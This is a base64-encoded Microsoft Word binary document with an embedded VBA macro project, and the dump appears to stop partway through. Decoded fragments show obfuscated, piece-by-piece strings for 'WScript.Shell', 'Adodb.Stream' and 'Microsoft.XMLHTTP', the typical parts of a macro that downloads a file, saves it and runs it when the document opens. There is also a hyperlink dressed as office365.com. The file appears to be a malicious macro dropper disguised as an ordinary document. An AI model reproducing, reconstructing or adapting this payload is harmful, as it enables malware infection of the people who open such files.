AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA/v8AAAYBAgAAAAAAAAAAAAAAAAAAAAAAAgAAAALVzdWcLhsQk5cIACss+a5EAAAA
BdXN1ZwuGxCTlwgAKyz5rjgBAAD0AAAADAAAAAEAAABoAAAADwAAAHAAAAAFAAAAhAAAAAYA
AACMAAAAEQAAAJQAAAAXAAAAnAAAAAsAAACkAAAAEAAAAKwAAAATAAAAtAAAABYAAAC8AAAA
DQAAAMQAAAAMAAAA0QAAAAIAAADjBAAAHgAAAAwAAABNSUNST1NPRlQAAAADAAAABAAAAAMA
AAABAAAAAwAAAFcCAAADAAAAAAAMAAsAAAAAAAAACwAAAAAAAAALAAAAAAAAAAsAAAAAAAAA
HhAAAAEAAAABAAAAAAwQAAACAAAAHgAAAAkAAADN4Ofi4O3o5QADAAAAAQAAAAAArAAAAAMA
AAAAAAAAIAAAAAEAAAA4AAAAAgAAAEAAAAABAAAAAgAAAAwAAABfUElEX0hMSU5LUwACAAAA
4wQAAEEAAABkAAAABgAAAAMAAAAUAEkAAwAAAAAAAAADAAAAAAAAAAMAAAAFAAAAHwAAABYA
AABoAHQAdABwADoALwAvAG8AZgBmAGkAYwBlADMANgA1AC4AYwBvAG0ALwAAAB8AAAABAAAA
AAABCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEA
AAACAAAAAwAAAAQAAAAFAAAABgAAAAcAAAAIAAAACQAAAAoAAAD+////DAAAAA0AAAAOAAAA
DwAAABAAAAARAAAAEgAAABMAAAAUAAAAFQAAAP7///8XAAAAGAAAABkAAAAaAAAAGwAAABwA
AAAdAAAAHgAAAB8AAAAgAAAAIQAAACIAAAAjAAAAJAAAACUAAAAmAAAA/v///ygAAAApAAAA
KgAAACsAAAAsAAAALQAAAC4AAAD+////MAAAADEAAAAyAAAAMwAAADQAAAA1AAAANgAAAP7/
///9////OQAAADoAAABKAAAA/v///z0AAAA+AAAAPwAAAEAAAABBAAAAQgAAAEMAAABEAAAA
RQAAAEYAAABHAAAASAAAAEkAAAD+/////v//////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////UgBvAG8AdAAgAEUAbgB0AHIAeQAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABYABQH//////////wMAAAAGCQIA
AAAAAMAAAAAAAABGAAAAAAAAAAAAAAAA4Jb7skbbzwE8AAAAABwAAAAAAABEAGEAdABhAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
CgACAf///////////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsA
AAD2FQAAAAAAADEAVABhAGIAbABlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAOAAIAAQAAAP//////////AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAFgAAAOogAAAAAAAAVwBvAHIAZABEAG8AYwB1AG0AZQBuAHQA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABoAAgEGAAAABQAAAP//
//8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANBQAAAAAAAAFAFMA
dQBtAG0AYQByAHkASQBuAGYAbwByAG0AYQB0AGkAbwBuAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAKAACAf///////////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAACcAAAAAEAAAAAAAAAUARABvAGMAdQBtAGUAbgB0AFMAdQBtAG0AYQByAHkASQBuAGYA
bwByAG0AYQB0AGkAbwBuAAAAAAAAAAAAAAA4AAIBBAAAAP//////////AAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALwAAAAAQAAAAAAAATQBhAGMAcgBvAHMAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAQECAAAA
DQAAAAsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAl8LJG288BQEzwskbbzwEAAAAAAAAAAAAA
AABWAEIAQQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAACAABAP//////////CQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMCXwskbb
zwFATPCyRtvPAQAAAAAAAAAAAAAAAGQAaQByAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAIA////////////////AAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsCAAAAAAAAVABoAGkAcwBEAG8A
YwB1AG0AZQBuAHQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABoA
AgEIAAAACgAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJAAAA
Dw0AAAAAAABfAFYAQgBBAF8AUABSAE8ASgBFAEMAVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAGgACAP///////////////wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAD4AAAAoCgAAAAAAAFAAUgBPAEoARQBDAFQAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAIBBwAAAAwAAAD/////
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZwAAAHQBAAAAAAAAAQAAAAIA
AAADAAAABAAAAAUAAAAGAAAABwAAAAgAAAD+////CgAAAAsAAAAMAAAADQAAAA4AAAAPAAAA
EAAAABEAAAASAAAAEwAAABQAAAAVAAAAFgAAABcAAAAYAAAAGQAAABoAAAAbAAAAHAAAAB0A
AAAeAAAAHwAAACAAAAAhAAAAIgAAACMAAAAkAAAAJQAAACYAAAAnAAAAKAAAACkAAAAqAAAA
KwAAACwAAAAtAAAALgAAAC8AAAAwAAAAMQAAADIAAAAzAAAANAAAADUAAAA2AAAANwAAADgA
AAA5AAAAOgAAADsAAAA8AAAAPQAAAP7///8/AAAAQAAAAEEAAABCAAAAQwAAAEQAAABFAAAA
RgAAAEcAAABIAAAASQAAAEoAAABLAAAATAAAAE0AAABOAAAATwAAAFAAAABRAAAAUgAAAFMA
AABUAAAAVQAAAFYAAABXAAAAWAAAAFkAAABaAAAAWwAAAFwAAABdAAAAXgAAAF8AAABgAAAA
YQAAAGIAAABjAAAAZAAAAGUAAABmAAAA/v///2gAAABpAAAAagAAAGsAAABsAAAA/v////7/
//9vAAAA/v//////////////////////////////////////////////////////////////
//////////////////////////8BB7KAAQAEAAAAAQAwKgICkAkAcBQGSAMAggIAZOMEBAAH
ABwAUHJvamVjdAVRACgAAEACFAYCFD2tAgoHAmwBFAgGEgkCEoBAfeBVAgAMAkoSPAIKFgAB
cnN0ZBBvbGU+AhlzAHQAAGQAbwBsAGVQAA0AaAAlXgADKgBcR3swMDAyMLA0MzAtAAgEBEMA
CgMCDgESMDA0Nn0jADIuMCMwI0M6AFxXaW5kb3dzAFxTeXNXb3c2BDRcA2UyLnRsYgAjT0xF
IEF1dIBvbWF0aW9uAGADAAKDRU5vcm1hbAWDRU6AQ3IAbQBhUYBGDgAggBEJgAEqDFxDAxIK
BpWSwVUEBACDIU9mZmljEYRnTwBmgABpAGMVgmekgB+agiFHezIAREY4RDA0Qy0ANUJGQS0x
MDFAQi1CREU1gGdBakGAZTSABTKIZ4C6ZwByYW0gRmlsZQBzICh4ODYpXEBDb21tb24DCVwA
TWljcm9zb2YAdCBTaGFyZWQAXE9GRklDRTEAMVxNU08uREwMTCOHEINQIDExLhAwIE9igeYg
TGlgYnJhcnkAJ4AADxECfAEAE8IBzacZAcJmVGhpc0RvYwB1bWVudEcAGAXACVRAaGkAcwBE
EUBKYwB1wEplAG5VQHAazgsy2gscwBIAFABIQgExwopPCgAsAB5CAgEFLMIh1+cqIkIIK0IB
EEIBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAABFgEAAfAAAADOBAAA1AAAANoBAAD/////1QQAAEkKAAAAAAAAAQAAAM2n1+cAAP//owAA
AIgAAAC2AP//AQEAAAAA/////wAAAAD///////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAwAAAAUAAAAHAAAA//////////8B
AQgAAAD/////eAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP//AAAAAE1F
AAD///////8AAAAA//8AAAAA//8BAQAAAADfAP//AAAAAAwA////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
//8oAAAAAgBTIv////8AAAEAUxD/////AAABAFMi/////wAAAAACPP////8AAP//AQEAAAAA
AQAoADEATgBvAHIAbQBhAGwALgBUAGgAaQBzAEQAbwBjAHUAbQBlAG4AdAAIAAAA/////wEB
aAIAAAwRGAJAAAAA/////wAAAAD//////////wAAAAAAAAAA/////wAAAAD/////////////
//8DAAMAAACUAAACAAAMERwCgAAAAP////8AAAAA//////////8AAAAAAAAAAP////8AAAAA
////////////////AwADAAAAlAAAAgAADBEeAsAAAAD/////AAAAAP//////////AAAAAAAA
AAD/////AAAAAP///////////////wMAAwAAAJQAAAIAAAwRGgL//////////wAAAAD/////
/////wAAAAAAAAAA/////wAAAAD///////////////8lACUAAACUAAACAABghCAC////////
//8IAP//AAAAAAAAAABghCIC//////////8CAP//AAAAAAAAAABghCQC//////////8CAP//
AAAAAAAAAABAhCYC//////////8MAP//AAAAAAAAAABAhCwC//////////8MAP//AAAAAAAA
AABAhC4C//////////8MAP//AAAAAAAAAAAghDYC///////////AAQAAAAAAAAAAAAAAAAAA
BAAAAAAAAAAAAAAAAAAAAAAAAAAbCKgBAAADAGCEOAL//////////wMA//8AAAAAAAAAAGCE
OgL//////////wMA//8AAAAAAAAAAGCEpAD//////////wMA//8AAAAAAAAAAAKA/v//////
EAD//zgCAAACAf//EAIAAAAAAAD//////////wAAAAAdAAAAJQAAAEAAAADAAAAA/////4AA
AAAAAAAA//////////8AAAAA/////5gBAAAEAAQAAAABAAAAAAAAAAAAAAAAAP//////////
EAIAAP//////////wAAAAP//////////EAIAAP//////////////////////////AAAAAAAA
AAD//////////wAAAAD///////////////////////////////8HAEACAABAfeBVAgDfAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA/soBAC4AIoEIAAYAAAAAAAAAAIEIBAYAAAAIAAAABIEIAAIAAAAQAAAAIoEIAAYAAAAY
AAAAAIEIBAYAAAAgAAAABIEIAAIAAAAoAAAAIoEIAAYAAAAwAAAAAIEIBAYAAAA4AAAABIEI
AAIAAABAAAAAIoEIAAYAAABIAAAAAIAIAAgAAABQAAAAAIAIAAgAAABYAAAAAIAIAAgAAABg
AAAAAIAIAAgAAABoAAAAAIEIADYAAABwAAAAAIEIAAYAAACoAAAAAIEIACwAAADIAgAAAIEI
AAYAAACwAAAAAIAIAAgAAAC4AAAAAIEIADYAAADAAAAAAIEIACoAAAD4AAAAAIAIAAgAAAAo
AQAAAIEIAAYAAAAwAQAAAIEIAC4AAAA4AQAAAIEIAAYAAABoAQAAAIEIABIAAABwAQAAAIEI
ABgAAACIAQAAAIEIAAoAAACgAQAAAIAIAAgAAACwAQAAAIAIABQAAAC4AQAAAIEIAAYAAADQ
AQAAAIEIAAgAAADYAQAAAIEIAAYAAADgAQAAAIEIAAgAAADoAQAAAIEIAAYAAADwAQAAAIEI
ADYAAAD4AQAAAIEIAAYAAAAwAgAAAIEIAAYAAAA4AgAAAIEIAA4AAABAAgAAAIEIAAYAAABQ
AgAAAIEIACAAAABYAgAAAIEIAAIAAAB4AgAAAIEIABoAAACAAgAAAIEIABQAAACgAgAAAIEI
AAYAAAC4AgAABIEIAAIAAADAAgAA/////wEBAAMAAJYEAAAAAAAAQUAaAgAAAABvAP//aAAA
AJYEQAAAAAAAQUAYAgAAAABvAP//UAAAAJYEgAAAAAAAQUAYAgAAAABvAP//OAAAAJYEwAAA
AAAAXQDyBAABAABdAPIEGAEAAF0A8gQwAQAAXQDyBEgBAADtALYAAQBXALYAAgBTYwsAtgAE
AHJpcHQLALYABAAuU2hlCwC2AAIAbGwLACQAKAIBAC4AJgIAAEEANAEAAAAAQQA0AQAAAABd
APIEYAEAAO0AtgABAFcAtgACAFNjCwC2AAQAcmlwdAsAtgAEAC5TaGULALYAAgBsbAsAJAAo
AgEALgAmAgAA7QC2AAQAQWRvZLYABwBiLlN0cmVhAAsAtgABAG0ACwAkACgCAQAuACwCAAAA
AAAAXQDyBHgBAABBADQBAAAAAO0AtgADAE1pYwC2AAQAcm9zbwsAtgAKAGZ0LlhNTEhUVFAL
